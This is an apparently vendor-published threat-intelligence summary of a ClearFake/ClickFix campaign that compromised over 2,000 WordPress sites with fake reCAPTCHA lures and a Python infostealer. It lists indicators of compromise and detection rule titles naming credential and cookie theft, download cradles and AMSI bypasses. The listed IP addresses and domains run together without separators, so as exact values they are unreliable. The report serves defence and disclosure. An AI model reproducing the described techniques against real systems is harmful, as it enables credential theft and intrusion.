Vega Threat Research uncovered a large-scale ClearFake / ClickFix campaign compromising over 2,000 WordPress sites. The operation uses a multi-stage infection chain and appears to function as a multi-tenant traffic distribution system, where initial access and victim filtering are handled upstream, and final payload delivery is controlled by downstream actors. Notably, the campaign leverages “EtherHiding”-style techniques, retrieving parts of its delivery logic from blockchain-based infrastructure to make takedown and analysis more difficult.
The attack begins in the browser with injected scripts that profile the victim’s environment and selectively deliver a fake verification prompt to targeted users. This often takes the form of a spoofed reCAPTCHA challenge, adding legitimacy to the lure and increasing the likelihood of user interaction. Victims are then tricked into executing a command on their own system, effectively bypassing traditional browser-based protections.
Once executed, the infection chain leverages trusted, signed binaries to run malicious scripts under legitimate-looking processes. These scripts download and execute additional payloads while evading common security controls and establishing persistence on the system.
In its final stage, the campaign deploys Python-based malware components, including a full-featured information stealer and a secondary lightweight implant. The malware operates largely in memory and uses legitimate infrastructure to blend in with normal activity.
The stealer targets a wide range of sensitive data, including browser-stored credentials, session cookies, financial information, cryptocurrency wallets, messaging apps, and various desktop applications. It also supports surveillance capabilities and system reconnaissance, enabling continued access and further exploitation.
IOCs (25)
Scan your environment for IOCs →IP ADDRESS 6
212.34.138.4138.124.66.23194.150.220.21845.155.69.22445.155.69.48193.33.195.32DOMAIN 10
fw96.data-api-cloud-program.in.netbagginess78.cloud-api-system-control.in.netalgorithm.in.netfrost-tree-nord.base-blockchain-ground-false.in.netwoosh-duck.agri-clock-core-sn.in.netcarlessclapped.comdownload2392.mediafire.comdownload2390.mediafire.combsc-testnet.drpc.orgdata-seed-prebsc-1-s1.bnbchain.orgSHA256 FILE HASH 4
36b7f4fef5e984a5d60352ef7661ba0bf809feebd749ba1d5ab8d90bdf7feda0556fdc9932afc5f176803ae67dbc3b9e54c611f1b720e1140ec540e2d151396a4bfdb2a8f9f3cf83c656c7f25352d46c46a58f5b685a407cf7210aecdc1464f79287520644ae33bd6655555fff86b4f026c7f3d1d838ead02b676172450bbb27FILE NAME 5
AcPowerNotification.exeSyncAppvPublishingServer.vbsmnvqlprtyntvktkhzktujkwslservice.exeDetections (10)
Enable detections →Connect your environment for suggestions and queries personalized to your security telemetry.
- Execution of WScript App-V Publishing script to proxy execution of PowerShell
- PowerShell Obfuscation Methods
- SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
- Detect extraction of web session cookies from browser processes or profile directories
- Alert on processes accessing browser credential stores, cookies, or session databases
- Detect encoded PowerShell, download cradles, and AMSI bypasses
- Detect executables masquerading as legitimate system files in non-standard directories
- Detect processes reading credential files, env vars, or config stores
- Detect clipboard-to-terminal paste operations containing encoded or obfuscated commands
- Detect malware resolving C2 addresses from public web services (pastebins, calendars, DNS TXT)